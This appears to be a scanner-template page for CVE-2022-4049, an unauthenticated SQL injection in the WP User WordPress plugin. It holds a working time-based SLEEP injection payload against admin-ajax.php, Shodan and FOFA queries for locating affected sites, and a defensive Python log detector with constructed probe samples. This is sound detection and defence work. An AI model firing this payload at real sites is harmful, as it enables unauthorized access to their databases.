WP User <= 7.0 - Unauthenticated SQLi
ID: CVE-2022-4049
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project
Description
The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
YAML Source
id: CVE-2022-4049

info:
  name: WP User <= 7.0 - Unauthenticated SQLi
  author: theamanrawat
  severity: critical
  description: |
    The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
  reference:
    - https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be
    - https://wordpress.org/plugins/wp-user/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4049
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4049
    cwe-id: CWE-89
    epss-score: 0.04713
    epss-percentile: 0.92631
    cpe: cpe:2.3:a:wp_user_project:wp_user:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 4
    vendor: wp_user_project
    product: wp_user
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wp-user/
    fofa-query: body=/wp-content/plugins/wp-user/
    publicwww-query: /wp-content/plugins/wp-user/
  tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project

http:
  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)

    attack: clusterbomb
    payloads:
      path:
        - "/index.php/user/"
        - "/user"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header_2, "text/html")
          - contains(body_2, 'Invalid Access')
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"wpuser_update_setting":"([0-9a-zA-Z]+)"'
        internal: true
# digest: 4b0a00483046022100adf9f86f08dba23ef26c5eb6a3791eb1c54430cfc1d19a38097cb0709bd2e52b022100c7ad9e5314722d0fa9d070f41222e9aaff495cf112d34c7b4cafd26b348f6e47:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template detects the vulnerability described above: it first fetches the plugin's user page to extract the wpuser_update_setting nonce, then sends the time-based probe to admin-ajax.php and matches on a response delay of at least 6 seconds. Run it with the Nuclei scanner against a target URL:
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4049.yaml"
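As an added defensive example (not part of the template or of the WPScan/cyllective material above), the check below inspects POST requests to admin-ajax.php for the wpuser_group_action handler and flags any `id` value that is not a plain integer, which is the shape of the template's probe; it assumes request records with method, path and body are available, for instance from a WAF or reverse-proxy audit log, and the records in the block are constructed samples.

```python
"""Flag admin-ajax.php requests shaped like the CVE-2022-4049 probe.

Added defensive example, not part of the Nuclei template. Assumes request
records (method, path, raw body) from a WAF or proxy audit log; the
SAMPLE_REQUESTS below are constructed, not real traffic.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlparse

# The template targets this AJAX action and injects into its `id` parameter.
TARGET_ACTION = "wpuser_group_action"
INT_RE = re.compile(r"^\d+$")
# Secondary signal: time-based functions used by SLEEP-style probes.
TIME_FUNCS_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)


def inspect_request(method: str, path: str, body: str) -> Optional[dict]:
    """Return a finding if the request hits the vulnerable handler with a
    non-integer `id`, otherwise None. The core rule is structural: `id`
    should be a plain integer, so any other value is anomalous even when no
    known SQL token is present."""
    if method.upper() != "POST":
        return None
    if not urlparse(path).path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)  # decodes '+' to space
    if params.get("action", [""])[0] != TARGET_ACTION:
        return None
    for value in params.get("id", []):
        if not INT_RE.match(value):
            return {"action": TARGET_ACTION, "param": "id", "value": value,
                    "time_based": bool(TIME_FUNCS_RE.search(value))}
    return None


# Constructed sample records: one benign GET, one legitimate POST, one probe
# shaped like the template's request, one unrelated action.
SAMPLE_REQUESTS = [
    ("GET", "/index.php/user/", ""),
    ("POST", "/wp-admin/admin-ajax.php",
     "action=wpuser_group_action&group_action=x&wpuser_update_setting=abc123&id=1"),
    ("POST", "/wp-admin/admin-ajax.php",
     "action=wpuser_group_action&group_action=x&wpuser_update_setting=abc123"
     "&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)"),
    ("POST", "/wp-admin/admin-ajax.php", "action=heartbeat&id=1 OR 1=1"),
]


def scan(records):
    """Run inspect_request over every record and keep the findings."""
    return [f for f in (inspect_request(*r) for r in records) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

Only the third sample is flagged: the `id` parameter is non-numeric and carries a SLEEP() call, while the unrelated heartbeat action is ignored even though its `id` looks suspicious, keeping the rule scoped to the affected handler.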